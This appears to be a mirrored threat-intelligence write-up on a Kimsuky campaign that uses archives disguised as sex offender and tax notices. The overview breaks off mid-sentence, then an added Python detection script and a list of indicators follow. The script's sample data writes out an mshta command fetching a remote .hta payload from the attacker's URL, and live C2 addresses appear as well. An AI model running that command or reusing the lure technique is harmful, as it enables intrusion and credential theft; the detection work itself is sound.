lazarusholic


Kimsuky Attack Disguised as Sex Offender Notification

2025-09-22, Logpresso
https://logpresso.com/en/blog/2025-09-22-kimsuky-attack
#Kimsuky #LNK

Contents

1. Overview
In late July 2025, a coordinated APT campaign leveraging Windows shortcut (.LNK) files was identified. Based on technical analysis, the attack is attributed to the Kimsuky group, a North Korean state-sponsored Advanced Persistent Threat (APT) actor primarily focused on cyber espionage and intelligence collection.
Malware Distribution and Execution Overview
The attackers deliver a crafted .LNK shortcut file embedded in a compressed archive; when the shortcut is opened it executes mshta.exe to fetch and decrypt a remote payload. That payload collects sensitive information from the infected system, including files, credentials, browser extensions and keystrokes, encrypts it, and transmits it to a remote command-and-control (C2) server. The malware also supports remote command execution and delivery of additional payloads.
Delivery Mechanism
- The threat actors distribute compressed decoy archives such as:
  - 성범죄자 신상정보 고지.zip (Sex Offender Notification.zip)
  - 국세 고지서.pdf.zip (National Tax Notice.pdf.zip)
  - sexoffender.zip
- Upon extraction, the archive contains:
  - Several password-protected decoy documents
  - A disguised .LNK file named 문서암호.txt.lnk (DocumentPassword.txt.lnk), which looks like a harmless text file holding the password for the decoy documents and so invites the user to open it
Execution Flow Upon User Interaction
- When the user executes …
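As an added example for the delivery and execution chain described above (this is not code from the Logpresso write-up and has nothing to do with the Kimsuky tooling itself), the Python script below performs two triage checks a responder would want: it lists .lnk members of an archive that carry a second, document-style extension such as 문서암호.txt.lnk, and it flags mshta.exe process-creation records whose command line contains a remote URL. The archive contents and the Sysmon-style event records are constructed here for offline use; the only value taken from this page is the .hta URL from the IoC list. The DOCUMENT_LIKE extension set, the record field names and the function names are my own choices, not anything from the report.

```python
"""Two triage checks for a zip -> .txt.lnk -> mshta.exe -> remote .hta chain.
Added example with constructed inputs; not from the original write-up."""
import io
import os
import re
import zipfile

# Extensions a shortcut might borrow to look like a document, as with 문서암호.txt.lnk.
# This set is an assumption; extend it to whatever your users actually open.
DOCUMENT_LIKE = {".txt", ".pdf", ".doc", ".docx", ".hwp", ".xls", ".xlsx",
                 ".ppt", ".pptx", ".jpg", ".png"}


def suspicious_lnk_members(zip_bytes: bytes) -> list[str]:
    """Return archive members that are .lnk files with a document-style inner extension."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            base, outer = os.path.splitext(info.filename.lower())
            if outer != ".lnk":
                continue
            _, inner = os.path.splitext(base)  # second extension, e.g. ".txt" in x.txt.lnk
            if inner in DOCUMENT_LIKE:
                hits.append(info.filename)
    return hits


def build_sample_archive() -> bytes:
    """Constructed stand-in for the decoy archive. Member bytes are placeholders, not the
    real decoy documents or shortcut; only the member names matter to the check."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("성범죄자 신상정보 고지/고지서1.pdf", b"%PDF-1.4 placeholder")
        zf.writestr("성범죄자 신상정보 고지/고지서2.docx", b"PK placeholder")
        zf.writestr("성범죄자 신상정보 고지/문서암호.txt.lnk", b"L\x00\x00\x00placeholder")
        zf.writestr("성범죄자 신상정보 고지/readme.lnk", b"L\x00\x00\x00placeholder")  # single extension
    return buf.getvalue()


URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed records in the shape of Sysmon Event ID 1 (Image / ParentImage / CommandLine).
# The second record reuses the .hta URL from this page's IoC list; the others are benign.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 5316, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://yfews.mailhubsec.com/comm/vpwepi.hta'},
    {"ProcessId": 6008, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\installer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"'},
]


def flag_mshta_remote(events: list[dict]) -> list[dict]:
    """Flag mshta.exe launches whose command line carries a remote http(s) URL.
    explorer.exe as parent matches a user double-clicking a shortcut whose target is
    mshta.exe directly; a cmd.exe or powershell.exe parent appears if the .lnk goes
    through a shell first, so the parent is reported but not required."""
    alerts = []
    for ev in events:
        if not ev["Image"].lower().endswith("\\mshta.exe"):
            continue
        urls = URL_RE.findall(ev["CommandLine"])
        if not urls:
            continue  # local .hta files are common enough to keep out of this rule
        alerts.append({
            "pid": ev["ProcessId"],
            "parent": ev["ParentImage"].rsplit("\\", 1)[-1],
            "url": urls[0],
            "hta": urls[0].lower().endswith(".hta"),
        })
    return alerts


if __name__ == "__main__":
    print(suspicious_lnk_members(build_sample_archive()))
    for alert in flag_mshta_remote(SAMPLE_EVENTS):
        print(alert)
```

The archive check only looks at member names, which is enough to pull a sample for analysis but not to prove intent; for the shortcut itself, parse the LNK target and argument strings (a library such as LnkParse3 does this) and apply the same mshta-plus-URL test to them. The process check deliberately ignores the parent so that both direct and shell-mediated launches are caught; tighten it to explorer.exe or cmd.exe parents only if local mshta noise in your environment makes that necessary.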

IoC

Network indicators:
https://yfews.mailhubsec.com/comm/vpwepi.hta
https://yajxu.mailhubsec.com/
142.11.248.98

File hashes:
acdf153ab1211ebc840a18d2ff2221fb
1a2164d9fea343bd5a5fc31a0849bb6e
373fce7c6fa68ad9afa22bcbf8c15f5d
5852e7911d0df2473d6ed34d1ce56ff7
9debce6651edac2a0e135a5b06f68a88
71a6e029ae3a56a1d5d244cdda0a93e0
425e7f14bfef366725fb806c93a0e94e
851910eb3c05738de97d66078acc32bc
baaa2dd6942f582cd7f684b5ebc447f0
e45606ec936210f3830f29d0e12108c8
444f67d186136d3deaae17a7f27b879e
677e77265c7ba52e825fc62023942213
95b0ee79eda2ea1857bda77aaaa71d92
40e117a35c579a2f17eafaa728abdee3
1230b4160b399b84453fd15ed7a6f1e0
5eb7a909d8e8e3773b2ccc780d8f765a
4593e0baa7e444537730c057b1a465f3
dcb9bcd4971167905a6924c4c2cef12e
172dc997ca6022ec8dff0842e4c7b887
17b2412c1c74db7e83482a544fefacdc
13d89e3f08197920230b521997135a6c
4aea7f8a80c27268bd68077621d69b68
5441d8a79411a261546beb1021cb5052
03794685a12ce0dd7b69e70ced8568f9